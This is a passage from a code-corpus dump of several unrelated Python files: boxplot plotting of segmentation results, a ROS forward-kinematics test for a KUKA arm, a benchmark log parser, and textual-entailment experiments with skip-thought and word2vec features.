res_item['desc'] = video_model.desc\r\n res_item['id'] = video_model.id\r\n s = t_url_tools.get_response_str(res_item)\r\n return s\r\n","sub_path":"video_manager/logic/video_ctrl.py","file_name":"video_ctrl.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"283083220","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 2 16:45:37 2020\n\n@author: jlazo\n\"\"\"\n\nimport pandas as pd\nimport os.path\nfrom os import path\nfrom PIL import Image\nfrom os import listdir\nfrom os.path import isfile, join\nfrom datetime import datetime\nimport csv\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.patches import Polygon\nimport cv2\nfrom matplotlib import gridspec\n\n\ndef stars(p):\n if p < 0.0001:\n return \"****\"\n elif (p < 0.001):\n return \"***\"\n elif (p < 0.01):\n return \"**\"\n elif (p < 0.05):\n return \"*\"\n else:\n return \"-\"\n\n\ndef get_mcc(groundtruth_list, predicted_list):\n \"\"\"Return mcc covering edge cases\"\"\"\n\n tn, fp, fn, tp = get_confusion_matrix_elements(groundtruth_list, predicted_list)\n\n if _all_class_0_predicted_as_class_0(groundtruth_list, predicted_list) is True:\n mcc = 1\n elif _all_class_1_predicted_as_class_1(groundtruth_list, predicted_list) is True:\n mcc = 1\n elif _all_class_1_predicted_as_class_0(groundtruth_list, predicted_list) is True:\n mcc = -1\n elif _all_class_0_predicted_as_class_1(groundtruth_list, predicted_list) is True:\n mcc = -1\n\n elif _mcc_denominator_zero(tn, fp, fn, tp) is True:\n mcc = -1\n\n # Finally calculate MCC\n else:\n mcc = ((tp * tn) - (fp * fn)) / (\n np.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn)))\n\n return mcc\n\n\ndef get_confusion_matrix_intersection_mats(groundtruth, predicted):\n \"\"\" Returns dict of 4 boolean numpy arrays with True at TP, FP, FN, TN\n \"\"\"\n\n confusion_matrix_arrs = {}\n\n groundtruth_inverse = np.logical_not(groundtruth)\n predicted_inverse = np.logical_not(predicted)\n\n confusion_matrix_arrs['tp'] = np.logical_and(groundtruth, predicted)\n confusion_matrix_arrs['tn'] = np.logical_and(groundtruth_inverse, predicted_inverse)\n confusion_matrix_arrs['fp'] = np.logical_and(groundtruth_inverse, predicted)\n confusion_matrix_arrs['fn'] = np.logical_and(groundtruth, predicted_inverse)\n\n return confusion_matrix_arrs\n\n\ndef get_confusion_matrix_overlaid_mask(image, groundtruth, predicted, alpha, colors):\n \"\"\"\n Returns overlay the 'image' with a color mask where TP, FP, FN, TN are\n each a color given by the 'colors' dictionary\n \"\"\"\n # image = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\n masks = get_confusion_matrix_intersection_mats(groundtruth, predicted)\n color_mask = np.zeros_like(image, dtype=np.float32)\n for label, mask in masks.items():\n color = colors[label]\n mask_rgb = np.zeros_like(image, dtype=np.float32)\n # mask_rgb = mask_rgb.astype(int)\n size_x, size_y, channels = np.shape(mask)\n plt.figure()\n plt.title(label)\n plt.imshow(mask.astype(np.float32))\n\n for x_index in range(size_x):\n for y_index in range(size_y):\n if mask[\n x_index, y_index, 0] != 0: # and mask[x_index, y_index, 1] == 0 and mask[x_index, y_index, 2] == 0:\n mask_rgb[x_index, y_index, :] = color\n # print(mask_rgb[x_index, y_index, :])\n\n color_mask += mask_rgb\n plt.close()\n\n \"\"\"for label, mask in masks.items():\n color = colors[label]\n mask_rgb = np.zeros_like(image)\n mask_rgb[mask != 0] = color\n color_mask += mask_rgb\n return cv2.addWeighted(image, alpha, color_mask, 1 - alpha, 0)\"\"\"\n\n return color_mask.astype(np.float32) # cv2.addWeighted(image, 0.1, color_mask, 0.5, 0)\n\n\ndef compare_boxplots(data, labels, Title):\n # Generate some random indices that we'll use to resample the original data\n # arrays. For code brevity, just use the same random indices for each array\n\n fig, ax1 = plt.subplots(figsize=(11, 7))\n fig.canvas.set_window_title('Boxplot Comparison')\n fig.subplots_adjust(left=0.075, right=0.95, top=0.85, bottom=0.25)\n\n bp = ax1.boxplot(data, notch=0, sym='+', vert=1, whis=1.5)\n plt.setp(bp['boxes'], color='black')\n plt.setp(bp['whiskers'], color='black')\n plt.setp(bp['fliers'], color='red', marker='+')\n\n # Add a horizontal grid to the plot, but make it very light in color\n # so we can use it for reading data values but not be distracting\n ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey',\n alpha=0.5)\n\n # Hide these grid behind plot objects\n ax1.set_axisbelow(True)\n # ax1.set_title(Title)\n ax1.set_xlabel('Model')\n ax1.set_ylabel(Title)\n\n # Now fill the boxes with desired colors\n # box_colors = ['darkkhaki', 'royalblue']\n box_colors = ['royalblue', 'royalblue']\n num_boxes = len(data)\n medians = np.empty(num_boxes)\n averages = np.empty(num_boxes)\n for i in range(num_boxes):\n box = bp['boxes'][i]\n boxX = []\n boxY = []\n for j in range(5):\n boxX.append(box.get_xdata()[j])\n boxY.append(box.get_ydata()[j])\n box_coords = np.column_stack([boxX, boxY])\n # Alternate between Dark Khaki and Royal Blue\n ax1.add_patch(Polygon(box_coords, facecolor=box_colors[i % 2]))\n # Now draw the median lines back over what we just filled in\n med = bp['medians'][i]\n medianX = []\n medianY = []\n for j in range(2):\n medianX.append(med.get_xdata()[j])\n medianY.append(med.get_ydata()[j])\n ax1.plot(medianX, medianY, 'k')\n medians[i] = medianY[0]\n averages[i] = np.average(data[i])\n # Finally, overplot the sample averages, with horizontal alignment\n # in the center of each box\n ax1.plot(np.average(med.get_xdata()), np.average(data[i]),\n color='w', marker='*', markeredgecolor='k')\n\n # Set the axes ranges and axes labels\n ax1.set_xlim(0.5, num_boxes + 0.5)\n top = 1.1\n bottom = -0.1\n ax1.set_ylim(bottom, top)\n\n ax1.set_xticklabels(np.repeat(labels, 2), fontsize=15, weight='bold')\n\n # set stars and lines\n y_max = 1.1\n y_min = 0.5\n # ax1.set_ylabel(fontsize=15, weight='bold')\n \"\"\"ax1.annotate(\"\", xy=(1, y_max), \n xycoords='data',\n xytext=(3, y_max), textcoords='data',\n arrowprops=dict(arrowstyle=\"-\", ec='#aaaaaa',\n connectionstyle=\"bar,fraction=0.04\"))\n\n ax1.annotate(\"\", xy=(1, y_max), \n xycoords='data',\n xytext=(5, y_max), textcoords='data',\n arrowprops=dict(arrowstyle=\"-\", ec='#aaaaaa',\n connectionstyle=\"bar,fraction=0.06\"))\n\n ax1.text(1.9, y_max + (y_max - y_min)*0.06, stars(0.01),\n horizontalalignment='center',\n verticalalignment='center', \n size='x-small') \n\n ax1.text(3, y_max + (y_max - y_min)*0.12, stars(0.01),\n horizontalalignment='center',\n verticalalignment='center', \n size='x-small') \n\n ax1.text(4, y_max + (y_max - y_min)*0.24, stars(0.01),\n horizontalalignment='center',\n verticalalignment='center',\n size='x-small') \n\n ax1.annotate(\"\", xy=(2, y_max), \n xycoords='data',\n xytext=(4, y_max), textcoords='data',\n arrowprops=dict(arrowstyle=\"-\", ec='#aaaaaa',\n connectionstyle=\"bar,fraction=0.08\"))\n\n ax1.annotate(\"\", xy=(2, y_max), \n xycoords='data',\n xytext=(6, y_max), textcoords='data',\n arrowprops=dict(arrowstyle=\"-\", ec='#aaaaaa',\n connectionstyle=\"bar,fraction=0.08\"))\n\n ax1.annotate(\"\", xy=(5, y_max), \n xycoords='data',\n xytext=(7, y_max), textcoords='data',\n arrowprops=dict(arrowstyle=\"-\", ec='#aaaaaa',\n connectionstyle=\"bar,fraction=0.04\"))\"\"\"\n\n # Due to the Y-axis scale being different across samples, it can be\n # hard to compare differences in medians across the samples. Add upper\n # X-axis tick labels with the sample medians to aid in comparison\n # (just use two decimal places of precision)\n pos = np.arange(num_boxes) + 1\n upper_labels = [str(round(s, 2)) for s in medians]\n weights = ['bold', 'semibold']\n for tick, label in zip(range(num_boxes), ax1.get_xticklabels()):\n k = tick % 2\n ax1.text(pos[tick], 0.95, upper_labels[tick],\n transform=ax1.get_xaxis_transform(),\n horizontalalignment='center', size='large',\n weight=weights[k], color=box_colors[k])\n\n # Finally, add a basic legend\n\n fig.text(0.10, 0.1, '---',\n backgroundcolor=box_colors[1], color='black', weight='roman',\n size='large')\n\n fig.text(0.10, 0.045, '--',\n backgroundcolor=box_colors[1],\n color='white', weight='roman', size='large')\n\n \"\"\"fig.text(0.10, 0.1, 'Grayscale dataset',\n backgroundcolor=box_colors[0], color='black', weight='roman',\n size='large')\n\n fig.text(0.10, 0.045, 'Color dataset',\n backgroundcolor=box_colors[1],\n color='white', weight='roman', size='large')\"\"\"\n\n fig.text(0.10, 0.005, '*', color='white', backgroundcolor='silver',\n weight='roman', size='large')\n\n fig.text(0.115, 0.003, 'Average Value', color='black', weight='roman',\n size='large')\n\n plt.show()\n\n\ndef read_results_csv(file_path, row_id=0):\n dice_values = []\n with open(file_path, 'r') as file:\n reader = csv.reader(file)\n for row in reader:\n dice_values.append(float(row[row_id]))\n\n return dice_values\n\n\ndef read_img_results(dir_image):\n original_img = cv2.imread(dir_image, cv2.COLOR_BGRA2RGBA)\n\n if original_img is None:\n print('Could not open or find the image:', args.input)\n exit(0)\n\n\ndef main():\n \"\"\"path_file_1 = '/home/nearlab/Jorge/current_work/lumen_segmentation/data/' \\\n 'lumen_data/results/' \\\n 'compare_color_space/maskrcnn/' \\\n 'results_evaluation_test_02_MaskRCNN_thershold_0.8_grayscale_.csv'\"\"\"\n\n path_file_1 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n 'data/polyps/results/test_02/' \\\n 'results_evaluation__test_02_new.csv'\n\n path_file_2 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n 'data/polyps/results/test_01/' \\\n 'results_evaluation__test_01_new.csv'\n\n path_file_3 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n 'data/polyps/results/test_03/' \\\n 'results_evaluation__test_03_new.csv'\n\n path_file_4 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n 'data/polyps/results/test_04/' \\\n 'results_evaluation__test_04_new.csv'\n\n path_file_5 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n 'data/polyps/results/test_05/' \\\n 'results_evaluation__test_05_new.csv'\n\n path_file_6 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n 'data/polyps/results/ensemble_2/' \\\n 'results_evaluation__ensemble_2_new.csv'\n\n path_file_7 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n 'data/polyps/results/test_07/' \\\n 'results_evaluation__test_07_new.csv'\n\n path_file_8 = '/home/nearlab/Jorge/current_work/lumen_segmentation/' \\\n 'data/polyps/results/test_08/' \\\n 'results_evaluation__test_08_new.csv'\n\n # SAN network\n # path_file_7 = '/home/jlazo/Desktop/current_work/ICPR2020/data/enlarged_dataset/ensembles'\n # restore the one bellow\n\n # unet bn\n\n labels = ['ResUnet', 'Mask-RCNN', 'Proposed 1', 'Proposed 2']\n\n data_experiment_1 = read_results_csv(path_file_1, 2)\n data_experiment_2 = read_results_csv(path_file_2, 2)\n data_experiment_3 = read_results_csv(path_file_3, 2)\n data_experiment_4 = read_results_csv(path_file_4, 2)\n data_experiment_5 = read_results_csv(path_file_5, 2)\n data_experiment_6 = read_results_csv(path_file_6, 2)\n data_experiment_7 = read_results_csv(path_file_7, 2)\n data_experiment_8 = read_results_csv(path_file_8, 2)\n\n data = [data_experiment_1, data_experiment_2,\n data_experiment_3,\n data_experiment_4,\n data_experiment_5,\n data_experiment_6,\n data_experiment_7,\n data_experiment_8]\n\n compare_boxplots(data, labels, 'DSC')\n\n data_experiment_1 = read_results_csv(path_file_1, 3)\n data_experiment_2 = read_results_csv(path_file_2, 3)\n data_experiment_3 = read_results_csv(path_file_3, 3)\n data_experiment_4 = read_results_csv(path_file_4, 3)\n data_experiment_5 = read_results_csv(path_file_5, 3)\n data_experiment_6 = read_results_csv(path_file_6, 3)\n data_experiment_7 = read_results_csv(path_file_7, 3)\n data_experiment_8 = read_results_csv(path_file_8, 3)\n\n data = [data_experiment_1, data_experiment_2,\n data_experiment_3,\n data_experiment_4,\n data_experiment_5,\n data_experiment_6,\n data_experiment_7,\n data_experiment_8]\n\n compare_boxplots(data, labels, 'Prec')\n\n data_experiment_1 = read_results_csv(path_file_1, 4)\n data_experiment_2 = read_results_csv(path_file_2, 4)\n data_experiment_3 = read_results_csv(path_file_3, 4)\n data_experiment_4 = read_results_csv(path_file_4, 4)\n data_experiment_5 = read_results_csv(path_file_5, 4)\n data_experiment_6 = read_results_csv(path_file_6, 4)\n data_experiment_7 = read_results_csv(path_file_7, 4)\n data_experiment_8 = read_results_csv(path_file_8, 4)\n\n data = [data_experiment_1, data_experiment_2,\n data_experiment_3,\n data_experiment_4,\n data_experiment_5,\n data_experiment_6,\n data_experiment_7,\n data_experiment_8]\n\n compare_boxplots(data, labels, 'Rec')\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"general/compare_boxes_plots.py","file_name":"compare_boxes_plots.py","file_ext":"py","file_size_in_byte":14065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"483116880","text":"#!/usr/bin/env python\n\n# import modules\nimport tf\nimport time\nimport rospy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom my_kuka_robot.srv import *\nfrom trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint\nfrom geometry_msgs.msg import Pose\nfrom sympy import mpmath\nfrom sympy import *\n\ndef debug_log(log):\n\tif (debug_mode):\n\t\tprint(log)\n\tpass\n\ndef rand_in_range(low, high):\n\treturn low + np.random.rand()*(high - low)\n\n# Radians to Degree\ndef rtod(q):\n\treturn q*180.0/np.pi\n\n# Degree to Radians\ndef dtor(q):\n\treturn q*np.pi/180.0\n\nclass FKTest(object):\n\n\tdef __init__(self):\n\t\tdebug_log(\"Step 1: initializing test script...\")\n\t\t# TODO\n\t\trospy.init_node(\"FK_test\")\n\n\t\tdebug_log(\"Step 2: waiting for service to be available.\")\n\t\trospy.wait_for_service('FK_service')\n\t\t# rospy.wait_for_service('IK_service')\n\n\t\tdebug_log(\"Step 3: creating a callable proxy to a service\")\n\t\t# TODO\n\t\tself.FKSolver = rospy.ServiceProxy('FK_service', robot_FK)\n\t\t# self.IK_proxy = rospy.ServiceProxy('IK_service', robo_IK)\n\n\t\tself.FK_REQ = [\tJointTrajectoryPoint(),\n\t\t\tJointTrajectoryPoint(),\n\t\t\tJointTrajectoryPoint()]\n\t\tself.FK_REQ[0].positions = (2.92, 0.01, -2.72, 2.94, 0.49, 3.65)\n\t\tself.FK_REQ[1].positions = (3.21, 1.16, -1.81, -4.04, -1.07, -3.72)\n\t\tself.FK_REQ[2].positions = (1.66, 0.84, -3.33, 1.27, -0.28, 2.96)\n\n\t\tself.FK_RESP = [Pose(),\n\t\t\tPose(),\n\t\t\tPose()]\n\t\tself.FK_RESP[0].position.x = 1.241097506\n\t\tself.FK_RESP[0].position.y = -0.308878104954\n\t\tself.FK_RESP[0].position.z = 2.66139826936\n\t\tself.FK_RESP[1].position.x = -2.94615069338\n\t\tself.FK_RESP[1].position.y = 0.00657260199077\n\t\tself.FK_RESP[1].position.z = 2.07021476465\n\t\tself.FK_RESP[2].position.x = 0.0908570554147\n\t\tself.FK_RESP[2].position.y = -0.118085650178\n\t\tself.FK_RESP[2].position.z = 2.69381803552\t\n\t\tself.FK_RESP[0].orientation.x = 0.973569123941\n\t\tself.FK_RESP[0].orientation.y = -0.159235851633\n\t\tself.FK_RESP[0].orientation.z = 0.00124492841665\n\t\tself.FK_RESP[0].orientation.w = -0.163724019669\n\t\tself.FK_RESP[1].orientation.x = -0.25579584927\n\t\tself.FK_RESP[1].orientation.y = -0.53186509833\n\t\tself.FK_RESP[1].orientation.z = 0.772125532224\n\t\tself.FK_RESP[1].orientation.w = 0.23560594891\n\t\tself.FK_RESP[2].orientation.x = 0.220283358922\n\t\tself.FK_RESP[2].orientation.y = -0.434902191935\n\t\tself.FK_RESP[2].orientation.z = -0.378367271047\n\t\tself.FK_RESP[2].orientation.w = 0.786875805596\n\t\tpass\n\n\tdef generate_FK_request(self):\n\t\ttheta1 = rand_in_range(dtor(-185), dtor(185))\n\t\ttheta2 = rand_in_range(dtor(-45), dtor(85))\n\t\ttheta3 = rand_in_range(dtor(-210), dtor(65))\n\t\ttheta4 = rand_in_range(dtor(-350), dtor(350))\n\t\ttheta5 = rand_in_range(dtor(-125), dtor(125))\n\t\ttheta6 = rand_in_range(dtor(-350), dtor(350))\n\n\t\ttheta_t = (theta1, theta2, theta3, theta4, theta5, theta6)\n\t\treturn theta_t\n\n\tdef run_tests(self):\n\t\terrors = 0\n\t\tdebug_log(\"Step 4: ready for testing.\")\n\t\tdebug_log(\"\\n Part 1: predefined tests\")\n\t\t# TODO: Response: FK_resp // Request: self.FK_REQ\n\t\tFK_resp = self.FKSolver(self.FK_REQ)\t\n\t\terrors += self.verify_result(FK_resp)\n\n\t\tdebug_log(\"\\n Part 2: random tests\")\n\t\tFK_reqs = []\n\t\tfor i in range(5):\n\t\t\tjoint_trajectory_point = JointTrajectoryPoint()\n\t\t\tjoint_trajectory_point.positions = self.generate_FK_request()\n\t\t\tFK_reqs.append(joint_trajectory_point)\n\t\t\n\t\tFK_resp = self.FKSolver(FK_reqs)\n\t\tself.show_result(FK_reqs, FK_resp)\n\n\t\tif(errors < 1):\n\t\t\tdebug_log(\"FK test passed!\")\n\t\telse:\n\t\t\tdebug_log(\"FK test failed\")\n\n\tdef show_result(self,FK_reqs, FK_resp):\n\t\tfor x in xrange(0, len(FK_resp.poses)): \n\t\t\tpos_r = FK_resp.poses[x].position\n\t\t\tori_r = FK_resp.poses[x].orientation\n\t\t\tdebug_log(\" FK_request {}: joint angles = {}\".format(x, FK_reqs[x].positions))\n\t\t\tdebug_log(\" FK_response {}: position = {},{},{}\".format(x, pos_r.x, pos_r.y, pos_r.z))\t\n\t\t\tdebug_log(\" FK_response {}: orientation = {},{},{},{}\\n\".format(x, ori_r.x,ori_r.y,ori_r.z,ori_r.w))\n\n\tdef verify_result(self,FK_resp):\n\t\terrors = 0\n\t\tfor x in xrange(0, len(FK_resp.poses)): \n\t\t\tpos_r = FK_resp.poses[x].position\n\t\t\tori_r = FK_resp.poses[x].orientation\n\t\t\tpos_e = self.FK_RESP[x].position\n\t\t\tori_e = self.FK_RESP[x].orientation\n\n\t\t\tpos_r_mat = Matrix([[pos_r.x], [pos_r.y], [pos_r.z]])\n\t\t\tpos_e_mat = Matrix([[pos_e.x], [pos_e.y], [pos_e.z]])\n\t\t\terr = (pos_r_mat - pos_e_mat).norm()\n\n\t\t\tdebug_log(\" received FK_response {}: position = {},{},{}\".format(x, pos_r.x, pos_r.y, pos_r.z))\t\n\t\t\tdebug_log(\" FK_response {}: orientation = {},{},{},{}\".format(x, ori_r.x,ori_r.y,ori_r.z,ori_r.w))\n\t\t\tdebug_log(\" expected FK_response {}: position = {},{},{}\".format(x, pos_e.x, pos_e.y, pos_e.z))\t\n\t\t\tdebug_log(\" FK_response {}: orientation = {},{},{},{}\".format(x, ori_e.x,ori_e.y,ori_e.z,ori_e.w))\n\t\t\tdebug_log(\" error: {}\\n\".format(err))\n\t\t\terrors += err\n\t\treturn errors\n\n\nif __name__ == \"__main__\":\n\n\tglobal debug_mode\n\tdebug_mode = True\n\n\tmy_kuka_FK_test = FKTest()\n\tmy_kuka_FK_test.run_tests()\n\n\trospy.spin()\n","sub_path":"catkin_ws/src/my_kuka_robot/scripts/FK_test.py","file_name":"FK_test.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"195905800","text":"import sys\nimport collections\n\nmodels = [('fc_data', 1, 0), \n ('fc_data', 2, 0),\n ('fc_data', 2, 1),\n ('fc_data_slice', 2, 0),\n ('fc_data_slice', 2, 1),\n ('fc_model', 2, 0),\n ('fc_data_ff', 1, 0),\n ('fc_data_ff', 2, 0),\n ('fc_data_ff', 2, 1),\n ('fc_model_ff', 2, 0),\n ('fc_single_manual', 1, 0),\n ('fc_model_manual', 2, 0),\n ('fc_data_manual', 2, 0),\n ]\n\nruntimes = {}\nwith open(sys.argv[1]) as f:\n token = 'Training '\n for line in f:\n index = line.find(token)\n if index == -1:\n continue\n line = line[index + len(token):]\n index = line.find('+')\n model = line[:index]\n line = line[index + 1:]\n index = line.find('+')\n nworkers = int(line[:index])\n line = line[index + 1:]\n index = line.find('+')\n gpu_aggr = int(line[:index])\n line = line[index + 1:]\n index = line.find('+')\n ws = int(line[:index])\n line = line[index + 1:]\n index = line.find(' ')\n bs = int(line[:index])\n line = line[line.find(', ') + 2:]\n runtime = float(line[:line.find(' ')])\n runtimes[(model, nworkers, gpu_aggr, ws, bs)] = runtime\n\n\nwith open(\"__out.csv\", \"w\") as wf:\n for ws in (1024, 2048, 4096, 8192):\n wf.write('%d x %d weights (%dMB)\\n' % (ws, ws, ws * ws / (2 ** 20)))\n for bs in [2 ** i for i in range(1, 14)]:\n wf.write('%d' % bs)\n for model in models:\n key = tuple(list(model) + [ws, bs])\n print(key)\n if key in runtimes:\n wf.write(', %.3f' % runtimes[key])\n else:\n wf.write(', N/A')\n wf.write('\\n')\n","sub_path":"benchmark/parse_mini.py","file_name":"parse_mini.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"301525625","text":"# -*- coding: utf-8 -*-\n\n# Created by junfeng on 4/6/16.\n\n# logging config\nimport logging\n\nfrom gensim.models import Word2Vec\n\nlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.DEBUG)\nlogger = logging.getLogger('eval_rte_dataset')\n\nfrom datetime import datetime\n\nlogger_filename = './log/eval_rte_dataset-{0}.log'.format(datetime.now())\nimport os.path\n# import os\n# if os.path.isfile(logger_filename):\n# os.remove(logger_filename)\nfile_handler = logging.FileHandler(logger_filename, mode='a')\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nfile_handler.setFormatter(formatter)\n\nlogger.addHandler(file_handler)\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression, LogisticRegressionCV\nfrom sklearn.cross_validation import StratifiedKFold, KFold\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import accuracy_score, log_loss\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import pairwise\n\nimport numpy as np\n\nimport skipthoughts\nimport rte_utils\n\n\ndef read_rte_data():\n logger.info('read data ...')\n vectorized_ts, vectorized_hs, labels = joblib.load('./data/processed-rte-dataset.pkl')\n return vectorized_ts, vectorized_hs, labels\n\n\ndef gen_cv():\n vectorized_ts, vectorized_hs, labels = read_rte_data()\n X_all = np.concatenate((vectorized_ts, vectorized_hs), axis=1)\n logger.info('X_all.shape: {0}'.format(X_all.shape))\n logger.info('labels.shape: {0}'.format(labels.shape))\n skf = StratifiedKFold(labels, n_folds=3, shuffle=True, random_state=919)\n return skf, X_all, labels\n\n\ndef run():\n mean_acc = 0.0\n mean_logloss = 0.0\n skf, X_all, labels = gen_cv()\n for fold, (test_index, train_index) in enumerate(skf, start=1):\n logger.info('at fold: {0}'.format(fold))\n logger.info('train samples: {0}, test samples: {1}'.format(len(train_index), len(test_index)))\n X_train, X_test = X_all[train_index], X_all[test_index]\n y_train, y_test = labels[train_index], labels[test_index]\n rfc = RandomForestClassifier(n_jobs=10, random_state=919)\n rfc.fit(X_train, y_train)\n y_test_predicted = rfc.predict(X_test)\n y_test_proba = rfc.predict_proba(X_test)\n # equals = y_test == y_test_predicted\n # acc = np.sum(equals) / float(len(equals))\n acc = accuracy_score(y_test, y_test_predicted)\n logger.info('test data predicted accuracy: {0}'.format(acc))\n # log loss -log P(yt|yp) = -(yt log(yp) + (1 - yt) log(1 - yp))\n logloss = log_loss(y_test, y_test_proba)\n logger.info('log loss at test data: {0}'.format(logloss))\n # logger.info('log loss at test data using label: {0}'.format(log_loss(y_test, y_test_predicted)))\n mean_acc += acc\n mean_logloss += logloss\n\n n_folds = skf.n_folds\n logger.info('mean acc: {0}'.format(mean_acc / n_folds))\n logger.info('mean log loss: {0}'.format(mean_logloss / n_folds))\n\n\ndef get_sentence_sample(pairs):\n sample_length = len(pairs)\n logger.info('sample length: {0}'.format(sample_length))\n ts = []\n hs = []\n labels = np.empty(sample_length, dtype=int)\n samples = []\n for i, pair in enumerate(pairs):\n value = pair.value\n labels[i] = value\n t = pair.text\n h = pair.hyp\n ts.append(t)\n hs.append(h)\n samples.append(u'{0} {1}'.format(t, h))\n if i % 1000 == 0:\n logger.info('processed sample {0}'.format(i))\n logger.info('unique ts: {0}, unique hs: {1}'.format(len(set(ts)), len(set(hs))))\n logger.info('unique sample: {0}'.format(len(set(samples))))\n logger.info('TRUE labels: {0}'.format(np.sum(labels)))\n return ts, hs, labels\n\n\ndef read_model():\n model = skipthoughts.load_model()\n return model\n\n\ndef read_rte_from_nltk(model=None, version=3):\n train_saved_path = './data/processed-rte{0}-train.pkl'.format(version)\n test_saved_path = './data/processed-rte{0}-test.pkl'.format(version)\n if os.path.isfile(train_saved_path) and os.path.isfile(test_saved_path):\n X_train, train_labels = joblib.load(train_saved_path)\n X_test, test_labels = joblib.load(test_saved_path)\n return X_train, X_test, train_labels, test_labels\n\n if model is None:\n model = read_model()\n\n from nltk.corpus import rte\n train_xml = 'rte{0}_dev.xml'.format(version)\n test_xml = 'rte{0}_test.xml'.format(version)\n train_pairs = rte.pairs(train_xml)\n test_pairs = rte.pairs(test_xml)\n\n train_ts, train_hs, train_labels = get_sentence_sample(train_pairs)\n logger.info('encoding train samples ...')\n logger.info('encoding ts ...')\n vectorized_train_ts = skipthoughts.encode(model, train_ts)\n logger.info('encoding hs ...')\n vectorized_train_hs = skipthoughts.encode(model, train_hs)\n X_train = np.concatenate((vectorized_train_ts, vectorized_train_hs), axis=1)\n\n test_ts, test_hs, test_labels = get_sentence_sample(test_pairs)\n logger.info('encoding test samples ...')\n logger.info('encoding ts ...')\n vectorized_test_ts = skipthoughts.encode(model, test_ts)\n logger.info('encoding hs ...')\n vectorized_test_hs = skipthoughts.encode(model, test_hs)\n X_test = np.concatenate((vectorized_test_ts, vectorized_test_hs), axis=1)\n\n logger.info('dump to file ...')\n joblib.dump((X_train, train_labels), train_saved_path)\n joblib.dump((X_test, test_labels), test_saved_path)\n logger.info('done')\n\n return X_train, X_test, train_labels, test_labels\n\n\nclass RTE2Cosine(object):\n\n def __init__(self, word2vec_model_file):\n self.model_file = word2vec_model_file\n self.word2vec = None\n\n def calculate_cosine_features(self, rte_data, version=3):\n train_saved_path = './rte_data/cosine-rte{0}-train.pkl'.format(version)\n test_saved_path = './rte_data/cosine-rte{0}-test.pkl'.format(version)\n if os.path.isfile(train_saved_path) and os.path.isfile(test_saved_path):\n train_data = joblib.load(train_saved_path)\n test_data = joblib.load(test_saved_path)\n return train_data, test_data\n\n if self.word2vec is None:\n logger.info('loading pre-trained word2vec model ...')\n self.word2vec = Word2Vec.load_word2vec_format(self.model_file, binary=True)\n\n def handle(df):\n data_cosines = np.empty((len(df), 2))\n for index, row in df.iterrows():\n text = row.text\n hypothesis = row.hypothesis\n text = text.split()\n hypothesis = hypothesis.split()\n sims = np.zeros((len(text), len(hypothesis)))\n for i, w1 in enumerate(text):\n for j, w2 in enumerate(hypothesis):\n if w1 not in self.word2vec or w2 not in self.word2vec:\n sim = 0.0\n else:\n sim = self.word2vec.similarity(w1, w2)\n sims[i, j] = sim\n text_max_cosines = np.max(sims, axis=1)\n text_mean_cosine = np.mean(text_max_cosines)\n hypothesis_max_cosines = np.max(sims, axis=0)\n hypothesis_mean_cosine = np.mean(hypothesis_max_cosines)\n data_cosines[index, 0] = text_mean_cosine\n data_cosines[index, 1] = hypothesis_mean_cosine\n return data_cosines\n\n train_df = rte_data.train_df\n test_df = rte_data.test_df\n train_data = handle(train_df)\n test_data = handle(test_df)\n joblib.dump(train_data, train_saved_path)\n joblib.dump(test_data, test_saved_path)\n return train_data, test_data\n\n\ndef logistic_test_using_cosine(score_feature=True):\n logger.info('using cosine features in logistic regression')\n if score_feature:\n logger.info('also use score feature')\n Cs = [2**t for t in range(0, 10, 1)]\n Cs.extend([3**t for t in range(1, 10, 1)])\n rte2cosine = RTE2Cosine('/home/junfeng/word2vec/GoogleNews-vectors-negative300.bin')\n X_train_all = []\n X_test_all = []\n train_labels_all = []\n test_labels_all = []\n for version in range(1, 4):\n logger.info('loading version {0} data ...'.format(version))\n rte_data = rte_utils.read_rte_from_nltk(version=version)\n X_train, X_test = rte2cosine.calculate_cosine_features(rte_data, version)\n\n train_labels = rte_data.train_df.label.values\n test_labels = rte_data.test_df.label.values\n X_train_all.append(X_train)\n X_test_all.append(X_test)\n train_labels_all.append(train_labels)\n test_labels_all.append(test_labels)\n if score_feature:\n y_train_proba, y_test_proba = joblib.load('./rte_data/logistic_score_rte{0}.pkl'.format(version))\n X_train = np.concatenate([X_train, y_train_proba.reshape((-1, 1))], axis=1)\n X_test = np.concatenate([X_test, y_test_proba.reshape((-1, 1))], axis=1)\n logger.info('X_train.shape: {0}'.format(X_train.shape))\n logger.info('X_test.shape: {0}'.format(X_test.shape))\n\n logreg = LogisticRegressionCV(Cs=Cs, cv=3, n_jobs=10, random_state=919)\n logreg.fit(X_train, train_labels)\n logger.info('best C is {0}'.format(logreg.C_))\n y_test_predicted = logreg.predict(X_test)\n acc = accuracy_score(test_labels, y_test_predicted)\n logger.info('evaluate at RTE {0} dataset'.format(version))\n logger.info('test data 